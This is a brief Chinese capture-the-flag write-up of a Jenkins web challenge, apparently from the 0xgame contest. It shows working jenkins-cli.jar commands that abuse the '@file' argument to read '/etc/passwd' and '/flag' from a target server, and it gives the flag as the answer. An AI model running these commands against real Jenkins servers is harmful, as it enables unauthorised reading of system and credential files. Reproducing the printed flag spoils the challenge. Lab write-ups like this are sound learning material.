1.前言
由于好久没做web题了,所以今天来尝试来做一波web题,仅供刷题记录。
2.题目
这个给的提示对于小白来说实在是友好的过劲。
3.分析
上网搜到一个关于Jenkins的历史漏洞,下面链接可供参考
https://blog.csdn.net/2301_80127209/article/details/139777834https://blog.csdn.net/2301_80127209/article/details/139777834
打开页面
利用框架漏洞 ,路径后进行添加 /jnlpJars/jenkins-cli.jar,下载下来文件
进行读取文件 ,这里我把下载下来的文件放在了z盘,大家要根据其文件实际位置进行操作
java -jar jenkins-cli.jar -s http://8.130.84.100:8080/ -http who-am-i "@/etc/passwd"
成功实现任意文件读取功能 ,但只是显示了一部分
尝试目标是否开启了“匿名用户可读”选项,开启了话则可以显示全部命令,当然这一步也可省略,但是我们可以测试一波也花不了多长时间
java -jar jenkins-cli.jar -s http://8.130.84.100:8080/ -http connect-node "@/etc/passwd"
这时候我们可以尝试读取flag内容了,根据做题经验,猜测flag在根目录下
java -jar jenkins-cli.jar -s http://8.130.84.100:8080/ -http connect-node "@/flag"
成功获取到flag
4.答案
0xgame{2a6d2b88-7d12-4b66-901d-5ed489e9a322}